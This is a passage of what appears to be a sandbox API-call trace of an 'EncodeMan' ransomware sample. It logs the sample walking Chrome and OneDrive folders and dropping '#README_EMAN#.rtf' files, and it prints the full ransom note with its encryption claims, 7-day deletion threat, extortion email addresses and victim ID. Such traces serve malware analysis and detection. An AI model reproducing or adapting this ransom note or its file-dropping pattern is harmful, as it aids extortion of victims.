Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 2 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\", cchCount2=73) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\", cchCount2=73) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\", cchCount2=73) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\", cchCount2=73) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\", cchCount2=73) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\", cchCount1=77, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\", cchCount2=73) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\", cchCount2=132) returned 3 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\", cchCount2=132) returned 3 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\", cchCount2=132) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\", cchCount2=132) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\", cchCount2=132) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\", cchCount2=132) returned 3 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\", cchCount2=132) returned 3 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\", cchCount2=132) returned 3 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\", cchCount2=132) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\", cchCount2=132) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\", cchCount2=132) returned 3 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\", cchCount1=77, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\", cchCount2=130) returned 3 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\", cchCount2=130) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\", cchCount2=130) returned 3 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\", cchCount2=130) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\", cchCount2=130) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\", cchCount2=130) returned 3 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\", cchCount2=133) returned 3 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\", cchCount2=133) returned 3 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\", cchCount2=139) returned 3 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\", cchCount2=139) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\", cchCount2=139) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\", cchCount2=139) returned 1 [0290.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\", cchCount2=139) returned 1 [0290.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\", cchCount2=139) returned 3 [0290.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\", cchCount2=139) returned 1 [0290.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\", cchCount2=139) returned 3 [0290.744] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\#readme_eman#.rtf")) returned 0x20 [0290.744] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\#readme_eman#.rtf")) returned 0x20 [0290.744] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\#readme_eman#.rtf")) returned 0xffffffff [0290.744] GetLastError () returned 0x2 [0290.744] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.102] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 